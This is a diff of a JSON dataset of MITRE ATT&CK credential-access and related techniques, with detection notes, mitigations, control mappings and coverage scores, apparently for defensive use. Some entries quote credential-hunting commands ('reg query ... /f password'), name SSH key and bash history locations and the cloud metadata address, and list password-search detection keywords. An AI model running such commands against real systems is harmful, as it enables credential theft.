-        "description": "Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained. Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism. Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.\n\nBrute forcing credentials may take place at various points during a breach. For example, adversaries may attempt to brute force access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) within a victim environment leveraging knowledge gathered from other post-compromise behaviors such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), [Account Discovery](https://attack.mitre.org/techniques/T1087), or [Password Policy Discovery](https://attack.mitre.org/techniques/T1201). Adversaries may also combine brute forcing activity with behaviors such as [External Remote Services](https://attack.mitre.org/techniques/T1133) as part of Initial Access.",
-        "url": "https://attack.mitre.org/techniques/T1110",
+        "tid": "T1552.001",
+        "name": "Unsecured Credentials: Credentials In Files",
+        "description": "Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.\n\nIt is possible to extract passwords from backups or saved virtual machines through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). (Citation: CG 2014) Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller. (Citation: SRD GPP)\n\nIn cloud and/or containerized environments, authenticated user and service account credentials are often stored in local configuration and credential files.(Citation: Unit 42 Hildegard Malware) They may also be found as parameters to deployment commands in container logs.(Citation: Unit 42 Unsecured Docker Daemons) In some cases, these files can be copied and reused on another machine or the contents can be read and then used to authenticate without needing to copy any files.(Citation: Specter Ops - Cloud Credential Storage)",
+        "url": "https://attack.mitre.org/techniques/T1552/001",
         "tactics": [
             "Credential Access"
         ],
-        "detection": "Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials. Also monitor for many failed authentication attempts across various accounts that may result from password spraying attempts. It is difficult to detect when hashes are cracked, since this is generally done outside the scope of the target network.",
+        "detection": "While detecting adversaries accessing these files may be difficult without knowing they exist in the first place, it may be possible to detect adversary use of credentials they have obtained. Monitor the command-line arguments of executing processes for suspicious words or regular expressions that may indicate searching for a password (for example: password, pwd, login, secure, or credentials). See [Valid Accounts](https://attack.mitre.org/techniques/T1078) for more information.",
         "platforms": [
-            "Azure AD",
             "Containers",
-            "Google Workspace",
             "IaaS",
             "Linux",
-            "Office 365",
-            "SaaS",
             "Windows",
             "macOS"
         ],
         "data_sources": [
-            "Application Log: Application Log Content",
             "Command: Command Execution",
-            "User Account: User Account Authentication"
+            "File: File Access"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
-        "subtechniques": [
-            {
-                "tid": "T1110.001",
-                "name": "Brute Force: Password Guessing",
-                "url": "https://attack.mitre.org/techniques/T1110/001",
-                "description": "Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts.\n\nGuessing passwords can be a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. (Citation: Cylance Cleaver)\n\nTypically, management services over commonly used ports are used when guessing passwords. Commonly targeted services include the following:\n\n* SSH (22/TCP)\n* Telnet (23/TCP)\n* FTP (21/TCP)\n* NetBIOS / SMB / Samba (139/TCP & 445/TCP)\n* LDAP (389/TCP)\n* Kerberos (88/TCP)\n* RDP / Terminal Services (3389/TCP)\n* HTTP/HTTP Management Services (80/TCP & 443/TCP)\n* MSSQL (1433/TCP)\n* Oracle (1521/TCP)\n* MySQL (3306/TCP)\n* VNC (5900/TCP)\n\nIn addition to management services, adversaries may \"target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,\" as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)\n\nIn default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows \"logon failure\" event ID 4625.",
-                "detection": "Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials.",
-                "mitigations": [
-                    {
-                        "mid": "M1036",
-                        "name": "Account Use Policies",
-                        "description": "Configure features related to account use like login attempt lockouts, specific login times, etc.",
-                        "url": "https://attack.mitre.org/mitigations/M1036"
-                    },
-                    {
-                        "mid": "M1032",
-                        "name": "Multi-factor Authentication",
-                        "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
-                        "url": "https://attack.mitre.org/mitigations/M1032"
-                    },
-                    {
-                        "mid": "M1027",
-                        "name": "Password Policies",
-                        "description": "Set and enforce secure password policies for accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1027"
-                    }
-                ]
-            },
+        "is_subtechnique": true,
+        "supertechnique": "T1552",
+        "subtechniques": [],
+        "mitigations": [
             {
-                "tid": "T1110.002",
-                "name": "Brute Force: Password Cracking",
-                "url": "https://attack.mitre.org/techniques/T1110/002",
-                "description": "Adversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes are obtained. [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) is used to obtain password hashes, this may only get an adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) is not an option. Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network.(Citation: Wikipedia Password cracking) The resulting plaintext password resulting from a successfully cracked hash may be used to log into systems, resources, and services in which the account has access.",
-                "detection": "It is difficult to detect when hashes are cracked, since this is generally done outside the scope of the target network. Consider focusing efforts on detecting other adversary behavior used to acquire credential materials, such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).",
-                "mitigations": [
-                    {
-                        "mid": "M1032",
-                        "name": "Multi-factor Authentication",
-                        "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
-                        "url": "https://attack.mitre.org/mitigations/M1032"
-                    },
-                    {
-                        "mid": "M1027",
-                        "name": "Password Policies",
-                        "description": "Set and enforce secure password policies for accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1027"
-                    }
-                ]
+                "mid": "M1047",
+                "name": "Audit",
+                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                "url": "https://attack.mitre.org/mitigations/M1047"
             },
             {
-                "tid": "T1110.003",
-                "name": "Brute Force: Password Spraying",
-                "url": "https://attack.mitre.org/techniques/T1110/003",
-                "description": "Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)\n\nTypically, management services over commonly used ports are used when password spraying. Commonly targeted services include the following:\n\n* SSH (22/TCP)\n* Telnet (23/TCP)\n* FTP (21/TCP)\n* NetBIOS / SMB / Samba (139/TCP & 445/TCP)\n* LDAP (389/TCP)\n* Kerberos (88/TCP)\n* RDP / Terminal Services (3389/TCP)\n* HTTP/HTTP Management Services (80/TCP & 443/TCP)\n* MSSQL (1433/TCP)\n* Oracle (1521/TCP)\n* MySQL (3306/TCP)\n* VNC (5900/TCP)\n\nIn addition to management services, adversaries may \"target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,\" as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)\n\nIn default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows \"logon failure\" event ID 4625.",
-                "detection": "Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). Specifically, monitor for many failed authentication attempts across various accounts that may result from password spraying attempts.\n\nConsider the following event IDs:(Citation: Trimarc Detecting Password Spraying)\n\n* Domain Controllers: \"Audit Logon\" (Success & Failure) for event ID 4625.\n* Domain Controllers: \"Audit Kerberos Authentication Service\" (Success & Failure) for event ID 4771.\n* All systems: \"Audit Logon\" (Success & Failure) for event ID 4648.",
-                "mitigations": [
-                    {
-                        "mid": "M1036",
-                        "name": "Account Use Policies",
-                        "description": "Configure features related to account use like login attempt lockouts, specific login times, etc.",
-                        "url": "https://attack.mitre.org/mitigations/M1036"
-                    },
-                    {
-                        "mid": "M1032",
-                        "name": "Multi-factor Authentication",
-                        "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
-                        "url": "https://attack.mitre.org/mitigations/M1032"
-                    },
-                    {
-                        "mid": "M1027",
-                        "name": "Password Policies",
-                        "description": "Set and enforce secure password policies for accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1027"
-                    }
-                ]
+                "mid": "M1027",
+                "name": "Password Policies",
+                "description": "Set and enforce secure password policies for accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1027"
             },
             {
-                "tid": "T1110.004",
-                "name": "Brute Force: Credential Stuffing",
-                "url": "https://attack.mitre.org/techniques/T1110/004",
-                "description": "Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.\n\nCredential stuffing is a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies.\n\nTypically, management services over commonly used ports are used when stuffing credentials. Commonly targeted services include the following:\n\n* SSH (22/TCP)\n* Telnet (23/TCP)\n* FTP (21/TCP)\n* NetBIOS / SMB / Samba (139/TCP & 445/TCP)\n* LDAP (389/TCP)\n* Kerberos (88/TCP)\n* RDP / Terminal Services (3389/TCP)\n* HTTP/HTTP Management Services (80/TCP & 443/TCP)\n* MSSQL (1433/TCP)\n* Oracle (1521/TCP)\n* MySQL (3306/TCP)\n* VNC (5900/TCP)\n\nIn addition to management services, adversaries may \"target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,\" as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)",
-                "detection": "Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials.",
-                "mitigations": [
-                    {
-                        "mid": "M1036",
-                        "name": "Account Use Policies",
-                        "description": "Configure features related to account use like login attempt lockouts, specific login times, etc.",
-                        "url": "https://attack.mitre.org/mitigations/M1036"
-                    },
-                    {
-                        "mid": "M1032",
-                        "name": "Multi-factor Authentication",
-                        "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
-                        "url": "https://attack.mitre.org/mitigations/M1032"
-                    },
-                    {
-                        "mid": "M1027",
-                        "name": "Password Policies",
-                        "description": "Set and enforce secure password policies for accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1027"
-                    },
-                    {
-                        "mid": "M1018",
-                        "name": "User Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1018"
-                    }
-                ]
+                "mid": "M1022",
+                "name": "Restrict File and Directory Permissions",
+                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1022"
+            },
+            {
+                "mid": "M1017",
+                "name": "User Training",
+                "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+                "url": "https://attack.mitre.org/mitigations/M1017"
             }
         ],
+        "cumulative_score": 0.4380952380952381,
+        "adjusted_score": 0.4380952380952381,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [
+            "3.1",
+            "3.2",
+            "3.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8",
+            "14.3",
+            "14.4",
+            "14.9",
+            "16.1",
+            "16.9",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-4",
+            "AC-5",
+            "AC-6",
+            "CA-7",
+            "CA-8",
+            "CM-2",
+            "CM-6",
+            "IA-2",
+            "IA-5",
+            "RA-5",
+            "SA-11",
+            "SA-15",
+            "SC-12",
+            "SC-28",
+            "SC-4",
+            "SC-7",
+            "SI-4"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1552.002",
+        "name": "Unsecured Credentials: Credentials in Registry",
+        "description": "Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.\n\nExample commands to find Registry keys related to password information: (Citation: Pentestlab Stored Credentials)\n\n* Local Machine Hive: reg query HKLM /f password /t REG_SZ /s\n* Current User Hive: reg query HKCU /f password /t REG_SZ /s",
+        "url": "https://attack.mitre.org/techniques/T1552/002",
+        "tactics": [
+            "Credential Access"
+        ],
+        "detection": "Monitor processes for applications that can be used to query the Registry, such as [Reg](https://attack.mitre.org/software/S0075), and collect command parameters that may indicate credentials are being searched. Correlate activity with related suspicious behavior that may indicate an active intrusion to reduce false positives.",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Process: Process Creation",
+            "Windows Registry: Windows Registry Key Access"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1552",
+        "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1036",
-                "name": "Account Use Policies",
-                "description": "Configure features related to account use like login attempt lockouts, specific login times, etc.",
-                "url": "https://attack.mitre.org/mitigations/M1036"
-            },
-            {
-                "mid": "M1032",
-                "name": "Multi-factor Authentication",
-                "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
-                "url": "https://attack.mitre.org/mitigations/M1032"
+                "mid": "M1047",
+                "name": "Audit",
+                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                "url": "https://attack.mitre.org/mitigations/M1047"
             },
             {
                 "mid": "M1027",
@@ -6184,309 +29198,303 @@
                 "url": "https://attack.mitre.org/mitigations/M1027"
             },
             {
-                "mid": "M1018",
-                "name": "User Account Management",
-                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                "url": "https://attack.mitre.org/mitigations/M1018"
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
             }
         ],
-        "cumulative_score": 0.8711880166666668,
-        "adjusted_score": 0.8711880166666668,
+        "cumulative_score": 0.3904761904761904,
+        "adjusted_score": 0.3904761904761904,
         "has_car": false,
         "has_sigma": true,
-        "has_es_siem": true,
-        "has_splunk": true,
+        "has_es_siem": false,
+        "has_splunk": false,
         "cis_controls": [
-            "4.1",
+            "3.1",
+            "3.2",
+            "3.3",
             "4.7",
-            "5.2",
             "5.3",
-            "6.3",
-            "6.4",
-            "6.5",
-            "4.10"
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8",
+            "18.3",
+            "18.5"
         ],
         "nist_controls": [
+            "AC-17",
             "AC-2",
-            "AC-20",
             "AC-3",
             "AC-5",
             "AC-6",
-            "AC-7",
             "CA-7",
-            "CM-2",
+            "CA-8",
+            "CM-5",
             "CM-6",
-            "IA-11",
             "IA-2",
-            "IA-4",
             "IA-5",
+            "RA-5",
+            "SA-11",
+            "SA-15",
+            "SC-12",
+            "SC-28",
+            "SC-4",
             "SI-4"
         ],
         "process_coverage": true,
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.46666666666666673,
-            "mitigation_score": 0.4,
-            "detection_score": 0.54
-        },
-        "choke_point_score": 0.4,
-        "prevalence_score": 0.00452135
+        "hardware_coverage": false
     },
     {
-        "tid": "T1111",
-        "name": "Two-Factor Authentication Interception",
-        "description": "Adversaries may target two-factor authentication mechanisms, such as smart cards, to gain access to credentials that can be used to access systems, services, and network resources. Use of two or multi-factor authentication (2FA or MFA) is recommended and provides a higher level of security than user names and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms. \n\nIf a smart card is used for two-factor authentication, then a keylogger will need to be used to obtain the password associated with a smart card during normal use. With both an inserted card and access to the smart card password, an adversary can connect to a network resource using the infected system to proxy the authentication with the inserted hardware token. (Citation: Mandiant M Trends 2011)\n\nAdversaries may also employ a keylogger to similarly target other hardware tokens, such as RSA SecurID. Capturing token input (including a user's personal identification code) may provide temporary access (i.e. replay the one-time passcode until the next value rollover) as well as possibly enabling adversaries to reliably predict future authentication values (given access to both the algorithm and any seed values used to generate appended temporary codes). (Citation: GCN RSA June 2011)\n\nOther methods of 2FA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Although primarily focused on by cyber criminals, these authentication mechanisms have been targeted by advanced actors. (Citation: Operation Emmental)",
-        "url": "https://attack.mitre.org/techniques/T1111",
+        "tid": "T1552.003",
+        "name": "Unsecured Credentials: Bash History",
+        "description": "Adversaries may search the bash command history on compromised systems for insecurely stored credentials. Bash keeps track of the commands users type on the command-line with the \"history\" utility. Once a user logs out, the history is flushed to the user’s .bash_history file. For each user, this file resides at the same location: ~/.bash_history. Typically, this file keeps track of the user’s last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Attackers can abuse this by looking through the file for potential credentials. (Citation: External to DA, the OS X Way)",
+        "url": "https://attack.mitre.org/techniques/T1552/003",
         "tactics": [
             "Credential Access"
         ],
-        "detection": "Detecting use of proxied smart card connections by an adversary may be difficult because it requires the token to be inserted into a system; thus it is more likely to be in use by a legitimate user and blend in with other network behavior.\n\nSimilar to [Input Capture](https://attack.mitre.org/techniques/T1056), keylogging activity can take various forms but can may be detected via installation of a driver, setting a hook, or usage of particular API calls associated with polling to intercept keystrokes.",
+        "detection": "Monitoring when the user's .bash_history is read can help alert to suspicious activity. While users do typically rely on their history of commands, they often access this history through other utilities like \"history\" instead of commands like cat ~/.bash_history.",
         "platforms": [
             "Linux",
-            "Windows",
             "macOS"
         ],
         "data_sources": [
-            "Driver: Driver Load",
-            "Process: OS API Execution",
-            "Windows Registry: Windows Registry Key Modification"
+            "Command: Command Execution",
+            "File: File Access"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1552",
         "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1017",
-                "name": "User Training",
-                "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
-                "url": "https://attack.mitre.org/mitigations/M1017"
+                "mid": "M1028",
+                "name": "Operating System Configuration",
+                "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1028"
             }
         ],
-        "cumulative_score": 0.3404761904761905,
-        "adjusted_score": 0.3404761904761905,
+        "cumulative_score": 0.2,
+        "adjusted_score": 0.2,
         "has_car": false,
-        "has_sigma": false,
+        "has_sigma": true,
         "has_es_siem": true,
-        "has_splunk": false,
+        "has_splunk": true,
         "cis_controls": [
-            "14.1",
-            "14.3"
+            "4.1",
+            "18.3",
+            "18.5"
         ],
         "nist_controls": [
-            "CA-7",
-            "CM-2",
             "CM-6",
-            "IA-2",
-            "IA-5",
-            "SI-3",
+            "CM-7",
+            "SC-28",
             "SI-4"
         ],
         "process_coverage": true,
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": true,
-        "actionability_score": {
-            "combined_score": 0.09047619047619047,
-            "mitigation_score": 0.16363636363636364,
-            "detection_score": 0.01
-        },
-        "choke_point_score": 0.25,
-        "prevalence_score": 0
+        "hardware_coverage": false
     },
     {
-        "tid": "T1112",
-        "name": "Modify Registry",
-        "description": "Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.\n\nAccess to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API.\n\nRegistry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API. (Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence. (Citation: TrendMicro POWELIKS AUG 2014) (Citation: SpectorOps Hiding Reg Jul 2017)\n\nThe Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system. (Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) for RPC communication.",
-        "url": "https://attack.mitre.org/techniques/T1112",
+        "tid": "T1552.004",
+        "name": "Unsecured Credentials: Private Keys",
+        "description": "Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials. Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures.(Citation: Wikipedia Public Key Crypto) Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc. \n\nAdversaries may also look in common key directories, such as ~/.ssh for SSH keys on * nix-based systems or C:\Users\(username)\.ssh\ on Windows. These private keys can be used to authenticate to [Remote Services](https://attack.mitre.org/techniques/T1021) like SSH or for use in decrypting other collected files such as email.\n\nAdversary tools have been discovered that search compromised systems for file extensions relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation: Palo Alto Prince of Persia)\n\nSome private keys require a password or passphrase for operation, so an adversary may also use [Input Capture](https://attack.mitre.org/techniques/T1056) for keylogging or attempt to [Brute Force](https://attack.mitre.org/techniques/T1110) the passphrase off-line.",
+        "url": "https://attack.mitre.org/techniques/T1552/004",
         "tactics": [
-            "Defense Evasion"
+            "Credential Access"
         ],
-        "detection": "Modifications to the Registry are normal and occur throughout typical use of the Windows operating system. Consider enabling Registry Auditing on specific keys to produce an alertable event (Event ID 4657) whenever a value is changed (though this may not trigger when values are created with Reghide or other evasive methods). (Citation: Microsoft 4657 APR 2017) Changes to Registry entries that load software on Windows startup that do not correlate with known software, patch cycles, etc., are suspicious, as are additions or changes to files within the startup folder. Changes could also include new services and modification of existing binary paths to point to malicious files. If a change to a service-related entry occurs, then it will likely be followed by a local or remote service start or restart to execute the file.\n\nMonitor processes and command-line arguments for actions that could be taken to change or delete information in the Registry. Remote access tools with built-in features may interact directly with the Windows API to gather information. The Registry may also be modified through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), which may require additional logging features to be configured in the operating system to collect necessary information for analysis.\n\nMonitor for processes, command-line arguments, and API calls associated with concealing Registry keys, such as Reghide. (Citation: Microsoft Reghide NOV 2006) Inspect and cleanup malicious hidden Registry entries using Native Windows API calls and/or tools such as Autoruns (Citation: SpectorOps Hiding Reg Jul 2017) and RegDelNull (Citation: Microsoft RegDelNull July 2016).",
+        "detection": "Monitor access to files and directories related to cryptographic keys and certificates as a means for potentially detecting access patterns that may indicate collection and exfiltration activity. Collect authentication logs and look for potentially abnormal activity that may indicate improper use of keys or certificates for remote authentication.",
         "platforms": [
-            "Windows"
+            "Linux",
+            "Windows",
+            "macOS"
         ],
         "data_sources": [
             "Command: Command Execution",
-            "Process: OS API Execution",
-            "Process: Process Creation",
-            "Windows Registry: Windows Registry Key Creation",
-            "Windows Registry: Windows Registry Key Deletion",
-            "Windows Registry: Windows Registry Key Modification"
+            "File: File Access"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1552",
         "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1024",
-                "name": "Restrict Registry Permissions",
-                "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.",
-                "url": "https://attack.mitre.org/mitigations/M1024"
+                "mid": "M1047",
+                "name": "Audit",
+                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                "url": "https://attack.mitre.org/mitigations/M1047"
+            },
+            {
+                "mid": "M1041",
+                "name": "Encrypt Sensitive Information",
+                "description": "Protect sensitive information with strong encryption.",
+                "url": "https://attack.mitre.org/mitigations/M1041"
+            },
+            {
+                "mid": "M1027",
+                "name": "Password Policies",
+                "description": "Set and enforce secure password policies for accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1027"
+            },
+            {
+                "mid": "M1022",
+                "name": "Restrict File and Directory Permissions",
+                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1022"
             }
         ],
-        "cumulative_score": 1.6047619047619048,
-        "adjusted_score": 1.6047619047619048,
-        "has_car": true,
-        "has_sigma": true,
-        "has_es_siem": true,
-        "has_splunk": true,
+        "cumulative_score": 0.43333333333333335,
+        "adjusted_score": 0.43333333333333335,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
         "cis_controls": [
-            "4.1"
+            "3.1",
+            "3.11",
+            "3.12",
+            "3.2",
+            "3.3",
+            "5.2",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8",
+            "11.3",
+            "18.3",
+            "18.5"
         ],
         "nist_controls": [
-            "AC-6",
-            "CM-7"
+            "AC-16",
+            "AC-17",
+            "AC-18",
+            "AC-19",
+            "AC-2",
+            "AC-20",
+            "CA-7",
+            "CA-8",
+            "CM-2",
+            "CM-6",
+            "IA-2",
+            "IA-5",
+            "RA-5",
+            "SA-11",
+            "SA-15",
+            "SC-12",
+            "SC-28",
+            "SC-4",
+            "SC-7",
+            "SI-12",
+            "SI-4",
+            "SI-7"
         ],
         "process_coverage": true,
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.5047619047619047,
-            "mitigation_score": 0.05454545454545454,
-            "detection_score": 1
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 1
+        "hardware_coverage": false
     },
     {
-        "tid": "T1113",
-        "name": "Screen Capture",
-        "description": "Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as CopyFromScreen, xwd, or screencapture.(Citation: CopyFromScreen .NET)(Citation: Antiquated Mac Malware)\n",
-        "url": "https://attack.mitre.org/techniques/T1113",
+        "tid": "T1552.005",
+        "name": "Unsecured Credentials: Cloud Instance Metadata API",
+        "description": "Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.\n\nMost cloud service providers support a Cloud Instance Metadata API which is a service provided to running virtual instances that allows applications to access information about the running virtual instance. Available information generally includes name, security group, and additional metadata including sensitive data such as credentials and UserData scripts that may contain additional secrets. The Instance Metadata API is provided as a convenience to assist in managing applications and is accessible by anyone who can access the instance.(Citation: AWS Instance Metadata API) A cloud metadata API has been used in at least one high profile compromise.(Citation: Krebs Capital One August 2019)\n\nIf adversaries have a presence on the running virtual instance, they may query the Instance Metadata API directly to identify credentials that grant access to additional resources. Additionally, attackers may exploit a Server-Side Request Forgery (SSRF) vulnerability in a public facing web proxy that allows the attacker to gain access to the sensitive information via a request to the Instance Metadata API.(Citation: RedLock Instance Metadata API 2018)\n\nThe de facto standard across cloud service providers is to host the Instance Metadata API at http[:]//169.254.169.254.\n",
+        "url": "https://attack.mitre.org/techniques/T1552/005",
         "tactics": [
-            "Collection"
+            "Credential Access"
         ],
-        "detection": "Monitoring for screen capture behavior will depend on the method used to obtain data from the operating system and write output files. Detection methods could include collecting information from unusual processes using API calls used to obtain image data, and monitoring for image files written to disk. The sensor data may need to be correlated with other events to identify malicious activity, depending on the legitimacy of this behavior within a given network environment.",
+        "detection": "Monitor access to the Instance Metadata API and look for anomalous queries.\n\nIt may be possible to detect adversary use of credentials they have obtained such as in [Valid Accounts](https://attack.mitre.org/techniques/T1078).",
         "platforms": [
-            "Linux",
-            "Windows",
-            "macOS"
+            "IaaS"
         ],
         "data_sources": [
-            "Command: Command Execution",
-            "Process: OS API Execution"
+            "User Account: User Account Authentication"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1552",
         "subtechniques": [],
-        "mitigations": [],
-        "cumulative_score": 0.3589895276190476,
-        "adjusted_score": 0.3589895276190476,
+        "mitigations": [
+            {
+                "mid": "M1042",
+                "name": "Disable or Remove Feature or Program",
+                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                "url": "https://attack.mitre.org/mitigations/M1042"
+            },
+            {
+                "mid": "M1037",
+                "name": "Filter Network Traffic",
